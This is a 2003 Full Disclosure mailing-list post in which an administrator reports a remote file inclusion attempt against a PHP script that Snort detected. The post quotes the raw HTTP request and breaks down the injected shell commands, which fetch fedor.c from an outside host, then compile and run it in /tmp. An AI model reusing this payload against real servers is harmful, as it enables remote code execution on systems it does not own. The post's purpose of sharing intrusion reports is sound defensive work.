Full Disclosure mailing list archives

http://xfteam.net/fedor.c - Anyone seen this before??

From: Dan <dan () lockedbox net>
Date: Mon, 24 Nov 2003 09:28:22 +0000

Hi,
Our Snort picked up an interesting attempt to download, compile and execute.
Noting also the fact that the sub dir its attempting to access has not been
there for over 4 months(/logjam/)?

Has anyone actually seen what this fedor.c is? I have done some google'ing but
it comes up blank.

Has anyone else noticed this kindof request recently?

Is it just me or is xfteam.net not resolving anyway?

Orignal HTTP request:
GET /logjam/showhits.php?
rel_path=http://xfteam.net/cmd.txt?&cmd=uname%20-a;cd%20/tmp;wget%20http://xfteam.net/fedor.c;gcc%20-o%20f%20fedor.c;./f?&cmd=uname%20-a;cd%20/tmp;wget%20http://xfteam.net/fedor.c;gcc%20-o%20f%20fedor.c;./f

Breaking this down we get(twice):
uname -a
cd /tmp
wget http://xfteam.net/fedor.c
gcc -o f fedor.c
./f


Regards,
Daniel.



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Current thread:

http://xfteam.net/fedor.c - Anyone seen this before?? Dan (Nov 24)
- Re: http://xfteam.net/fedor.c - Anyone seen this before?? Robert Jaroszuk (Nov 24)
- Re: http://xfteam.net/fedor.c - Anyone seen this before?? gml (Nov 24)
- Re: http://xfteam.net/fedor.c - Anyone seen this before?? kang () insecure ws (Nov 24)
  - Re: http://xfteam.net/fedor.c - Anyone seen this before?? Dan (Nov 24)
- Re: http://xfteam.net/fedor.c - Anyone seen this before?? kang () insecure ws (Nov 24)
- Re: http://xfteam.net/fedor.c - Anyone seen this before?? Dan (Nov 24)
- Re: http://xfteam.net/fedor.c - Anyone seen this before?? kang () insecure ws (Nov 24)
- Re: http://xfteam.net/fedor.c - Anyone seen this before?? gml (Nov 24)
- <Possible follow-ups>
- Re: http://xfteam.net/fedor.c - Anyone seen this before?? root (Nov 24)